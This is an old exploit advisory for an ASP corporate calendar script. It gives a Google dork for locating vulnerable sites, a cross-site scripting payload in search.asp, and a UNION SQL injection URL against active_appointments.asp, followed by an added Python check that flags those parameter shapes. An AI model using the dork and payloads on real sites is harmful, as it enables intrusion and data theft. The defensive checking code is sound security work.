ASP Inline Corporate Calendar (SQL-XSS) Multiple Remote Vulnerabilities

2009-05-21 17:33:19

[+] Script : ASP Talk

[+] Exploit Type : Multiple Exploits (SQL/CSS)

[+] Google Dork : intitle:"ASP inline corporate calendar" inurl:.asp?id=

[+] Contact : blackbeard-sql A.T hotmail.fr

--//--> Exploit :

1) Cross site scripting :

http://[website]/[script]/search.asp?keyword=<script>alert('bl@ckbe@rd');</script>&SearchIn=All

post = <script>alert('Bl@clbe@rD Is Here');</script>

2) Remote sql injection Exploit :

http://[website]/[script]/active_appointments.asp?sortby=Event_Title&order=DESC+union+select+(number of columns)+from+users

[peace xD]
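A defender-side check for the two request shapes listed above, added here as an example and not part of the original advisory or the product's code. It assumes `sortby` is meant to carry only a bare column name, `order` only ASC or DESC, and `keyword` plain search text; the `/calendar/` path and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request targets: two benign, two using the parameter shapes from the advisory.
SAMPLE_REQUESTS = [
    "/calendar/active_appointments.asp?sortby=Event_Title&order=DESC",
    "/calendar/active_appointments.asp?sortby=Event_Title"
    "&order=DESC+union+select+(number of columns)+from+users",
    "/calendar/search.asp?keyword=board+meeting&SearchIn=All",
    "/calendar/search.asp?keyword=<script>alert('bl@ckbe@rd');</script>&SearchIn=All",
]

IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")  # a bare column name
DIRECTIONS = {"", "ASC", "DESC"}                      # the only valid sort directions
MARKUP = re.compile(r"[<>]")                          # must be HTML-encoded on output


def check_request(target):
    """Return a list of findings for one request target (path?query)."""
    parts = urlsplit(target)
    page = parts.path.rsplit("/", 1)[-1].lower()
    params = parse_qs(parts.query, keep_blank_values=True)  # also URL-decodes values
    findings = []
    if page == "active_appointments.asp":
        for value in params.get("sortby", []):
            if not IDENTIFIER.fullmatch(value):
                findings.append("sortby is not a bare column name")
        for value in params.get("order", []):
            if value.strip().upper() not in DIRECTIONS:
                findings.append("order is not ASC or DESC")
    elif page == "search.asp":
        for value in params.get("keyword", []):
            if MARKUP.search(value):
                findings.append("keyword contains HTML metacharacters")
    return findings


def triage(requests):
    """Map each suspicious request target to its findings; clean requests are omitted."""
    return {r: f for r in requests if (f := check_request(r))}


if __name__ == "__main__":
    for target, findings in triage(SAMPLE_REQUESTS).items():
        print(findings, target)
```

The same allowlist belongs in the application itself: a sort column and direction cannot be bound as query parameters, so they have to be matched against fixed values before the query is built, and `keyword` has to be HTML-encoded when it is echoed back.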


Fixes

No fixes
